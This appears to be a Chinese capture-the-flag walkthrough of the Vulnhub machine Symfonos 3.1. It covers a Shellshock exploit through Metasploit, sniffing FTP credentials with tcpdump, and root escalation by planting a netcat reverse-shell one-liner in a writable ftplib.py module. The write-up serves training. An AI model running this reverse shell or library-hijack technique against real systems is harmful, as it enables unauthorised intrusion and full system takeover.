Vulnhub靶機:Symfonos3.1

標(biāo)簽shellshock破殼CVE-2014-6271嗅探ftp數(shù)據(jù)包捎废、python提權(quán)

0x00 環(huán)境準(zhǔn)備

下載地址:https://www.vulnhub.com/entry/symfonos-31,332/
flag數(shù)量:1
攻擊機:kali
攻擊機地址:192.168.1.31
靶機描述:

Intermediate real life based machine designed to test your skill at enumeration. If you get stuck remember to try different wordlist, avoid rabbit holes and enumerate everything thoroughly. SHOULD work for both VMware and Virtualbox.
For hints you're welcome to contact me via Twitter @zayotic

## Changelog v3.1 - 2020-04-07 v3.0 - 2019-07-20

0x01 信息搜集

1.探測靶機地址

命令:arp-scan -l

靶機地址是192.168.1.43

2.探測靶機開放端口

命令:nmap -sV -p- 192.168.1.43

看一下80端口

就是一張圖片曹洽,由于這次沒有smb服務(wù)了,再看看80端口上還有沒有其他信息蹭沛。
F12看一下源碼

發(fā)現(xiàn)有一句注釋臂寝,翻譯過來大概是“你能破獲地下世界嗎?”摊灭。感覺是要掃描目錄咆贬。

3.目錄掃描

先用dirb掃描一下,命令:dirb http://192.168.1.43

發(fā)現(xiàn)了一些目錄帚呼,訪問一下看看掏缎,發(fā)現(xiàn)http://192.168.1.43/gate/可以正常訪問

再爆破一下gate下的目錄,但是沒有爆破出來什么煤杀。
嘗試使用dirbuster工具進行爆破

掃描出一堆/cdi-bin/下的目錄

打開幾個看一下

發(fā)現(xiàn)打開的幾個頁面都是這樣的眷蜈,只是時間不同。這個像是uptime命令的輸出結(jié)果沈自。

去看了一下表哥的文章酌儒,發(fā)現(xiàn)這里存在shellshock漏洞

0x02 shellshock漏洞getshell

CVE編號:CVE-2014-6271

漏洞成因:
Bash 4.3以及之前的版本在處理某些構(gòu)造的環(huán)境變量時存在安全漏洞酥泛,向環(huán)境變量值內(nèi)的函數(shù)定義后添加多余的字符串會觸發(fā)此漏洞今豆,攻擊者可利用此漏洞改變或繞過環(huán)境限制嫌拣,以執(zhí)行任意的shell命令,甚至完全控制目標(biāo)系統(tǒng)
受到該漏洞影響的bash使用的環(huán)境變量是通過函數(shù)名稱來調(diào)用的,以“(){”開頭通過環(huán)境變量來定義的呆躲。而在處理這樣的“函數(shù)環(huán)境變量”的時候异逐,并沒有以函數(shù)結(jié)尾“}”為結(jié)束,而是一直執(zhí)行其后的shell命令

影響版本:

關(guān)于該漏洞的其他詳細(xì)信息可看https://www.freebuf.com/articles/system/45390.html

在msf中找找看有沒有利用工具插掂。
打開msf灰瞻,查找shellshock利用模塊,命令:search shellshock

由于靶機使用的是apache辅甥,這里選擇使用exploit/multi/http/apache_mod_cgi_bash_env_exec模塊酝润,命令:use exploit/multi/http/apache_mod_cgi_bash_env_exec

設(shè)置參數(shù):

利用成功:

0x03 嗅探ftp數(shù)據(jù)包

這個靶機的提權(quán)有點CTF的味道,我參考的表哥的文章進行提權(quán)璃弄。以下內(nèi)容都是參考表哥的文章要销。
下載pspy工具https://github.com/DominicBreuker/pspy,進行嗅探夏块。

pspy是一種命令行工具疏咐,旨在無需root權(quán)限即可監(jiān)聽進程。它使您可以查看其他用戶執(zhí)行的命令脐供,cron作業(yè)等浑塞。非常適合枚舉CTF中的Linux系統(tǒng)。很好地向您的同事展示為什么在命令行中將秘密作為參數(shù)傳遞是一個壞主意政己。
該工具從procfs掃描中收集信息酌壕。放置在文件系統(tǒng)選定部分上的Inotify觀察程序?qū)⒂|發(fā)這些掃描,以捕獲短暫的進程歇由。

使用python切換到shell環(huán)境卵牍,輸入uname -a查看機器是64位的,那就下載64位的pspy

切換到/tmp目錄進行下載印蓖,命令:wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64
然后給pspy64執(zhí)行權(quán)限chmod 777 pspy64辽慕,輸入命令:./pspy64 -pf -c -i 1000

在這里發(fā)現(xiàn)ftpclient.py正在運行,而且UID=0赦肃,說明正在以root的身份運行

ftp協(xié)議是明文傳輸?shù)?/strong>溅蛉,如果能抓到ftp的包,那就可以得到賬號密碼了他宛。那么使用什么工具抓包呢船侧?比較常用的是tcpdump,查看靶機上是否安裝了tcpdump厅各,命令:tcpdump --version

靶機上已經(jīng)安裝了tcpdump镜撩,那就使用它來抓包。
查看靶機上有哪些網(wǎng)絡(luò)接口

tcpdump一般抓取loopback狀態(tài)的接口队塘,這里抓取lo接口袁梗,命令:tcpdump -i lo -w ftp.pcap

ftp.pcap下載到kali上使用wireshark進行分析宜鸯。
在靶機上開啟臨時http服務(wù)

在kali上下載

使用wirewhark打開,輸入tcp.port==21篩選遮怜,在下面符合條件的數(shù)據(jù)包中找一條淋袖,右鍵“追蹤流”

然后就能看到賬號密碼了。

賬號密碼:hades \ PTpZTfU4vxgzvRBE

0x04 提權(quán)

使用剛才拿到的ftp賬號嘗試登錄ssh锯梁,

登錄成功
剛才使用pspy工具的時候發(fā)現(xiàn)即碗,ftpclient.py是以root身份運行的,如果hades用戶具有對ftpclient.py腳本的寫入權(quán)限陌凳,那么就可以提權(quán)剥懒。

很遺憾hades用戶組只有讀權(quán)限沒有寫權(quán)限,看一下ftpclient.py的代碼吧

使用命令查找一下hades對哪些文件有寫權(quán)限吧合敦,命令:find / -writable -type d 2>/dev/null

誒初橘,在里面發(fā)現(xiàn)我們對python2.7目錄下的文件有寫權(quán)限。剛才我們查看了ftpclient.py文件蛤肌,其中會import ftplib模塊壁却,如果我們可以修改ftplib模塊,在ftpclien.py文件運行的時候裸准,就會執(zhí)行我們修改后的代碼,那么就可以反彈shell了赔硫。
使用nano工具進行編輯炒俱,命令:nano ftplib.py

將反彈shell語句插入進去,語句:import os;os.system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.xxx.xxxx 7777 >/tmp/f')
然后保存退出

在kali上監(jiān)聽7777端口爪膊,等待反彈

大約等了2分鐘权悟,接收到了,身份是root

flag在/root目錄下

0x05 小結(jié)

靶機從破殼漏洞開始推盛,使用msf拿到shell峦阁,之后使用pspy工具發(fā)現(xiàn)ftp軟件正在運行,由于ftp是明文傳輸?shù)脑懦桑栽趂tp的數(shù)據(jù)包中可以看到賬號密碼榔昔,然后使用tcpdump工具抓包,發(fā)現(xiàn)了ftp的賬號密碼瘪菌。巧合的是SSH服務(wù)使用的賬號密碼和FTP服務(wù)是同一個撒会,所以可以使用FTP服務(wù)登錄SSH服務(wù),之后通過向ftplib.py文件中追加命令進行提權(quán)师妙。

由于我不會每天都登錄簡書诵肛,所以有什么私信或者評論我都不能及時回復(fù),如果想要聯(lián)系我最好給我發(fā)郵件默穴,郵箱:Z2djMjUxMTBAMTYzLmNvbQ==怔檩,如果發(fā)郵件請備注“簡書”


參考鏈接:

1.vulnhub - /symfonos-3 (考點:shellshock & tcpdump /cap & linux修改py提權(quán))
2.『VulnHub系列』symfonos: 3-Walkthrough
3.tcpdump抓包使用小結(jié)
4.破殼(ShellShock)漏洞樣本分析報告
5.CVE-2014-6271破殼(shellshock)漏洞復(fù)現(xiàn)記錄
6.https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_-_linux.html

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末褪秀,一起剝皮案震驚了整個濱河市,隨后出現(xiàn)的幾起案子薛训,更是在濱河造成了極大的恐慌媒吗,老刑警劉巖,帶你破解...
    沈念sama閱讀 211,817評論 6 492
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件许蓖,死亡現(xiàn)場離奇詭異蝴猪,居然都是意外死亡,警方通過查閱死者的電腦和手機膊爪,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 90,329評論 3 385
  • 文/潘曉璐 我一進店門自阱,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人米酬,你說我怎么就攤上這事沛豌。” “怎么了赃额?”我有些...
    開封第一講書人閱讀 157,354評論 0 348
  • 文/不壞的土叔 我叫張陵加派,是天一觀的道長。 經(jīng)常有香客問我跳芳,道長芍锦,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 56,498評論 1 284
  • 正文 為了忘掉前任飞盆,我火速辦了婚禮娄琉,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘吓歇。我一直安慰自己孽水,他們只是感情好,可當(dāng)我...
    茶點故事閱讀 65,600評論 6 386
  • 文/花漫 我一把揭開白布城看。 她就那樣靜靜地躺著女气,像睡著了一般。 火紅的嫁衣襯著肌膚如雪测柠。 梳的紋絲不亂的頭發(fā)上炼鞠,一...
    開封第一講書人閱讀 49,829評論 1 290
  • 那天,我揣著相機與錄音鹃愤,去河邊找鬼簇搅。 笑死,一個胖子當(dāng)著我的面吹牛软吐,可吹牛的內(nèi)容都是我干的瘩将。 我是一名探鬼主播,決...
    沈念sama閱讀 38,979評論 3 408
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼姿现!你這毒婦竟也來了肠仪?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 37,722評論 0 266
  • 序言:老撾萬榮一對情侶失蹤备典,失蹤者是張志新(化名)和其女友劉穎异旧,沒想到半個月后,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體提佣,經(jīng)...
    沈念sama閱讀 44,189評論 1 303
  • 正文 獨居荒郊野嶺守林人離奇死亡吮蛹,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 36,519評論 2 327
  • 正文 我和宋清朗相戀三年,在試婚紗的時候發(fā)現(xiàn)自己被綠了拌屏。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片潮针。...
    茶點故事閱讀 38,654評論 1 340
  • 序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖倚喂,靈堂內(nèi)的尸體忽然破棺而出每篷,到底是詐尸還是另有隱情,我是刑警寧澤端圈,帶...
    沈念sama閱讀 34,329評論 4 330
  • 正文 年R本政府宣布焦读,位于F島的核電站,受9級特大地震影響舱权,放射性物質(zhì)發(fā)生泄漏矗晃。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點故事閱讀 39,940評論 3 313
  • 文/蒙蒙 一宴倍、第九天 我趴在偏房一處隱蔽的房頂上張望喧兄。 院中可真熱鬧,春花似錦啊楚、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,762評論 0 21
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至郭变,卻和暖如春颜价,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背诉濒。 一陣腳步聲響...
    開封第一講書人閱讀 31,993評論 1 266
  • 我被黑心中介騙來泰國打工周伦, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留,地道東北人未荒。 一個月前我還...
    沈念sama閱讀 46,382評論 2 360
  • 正文 我出身青樓专挪,卻偏偏與公主長得像,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個殘疾皇子寨腔,可洞房花燭夜當(dāng)晚...
    茶點故事閱讀 43,543評論 2 349

推薦閱讀更多精彩內(nèi)容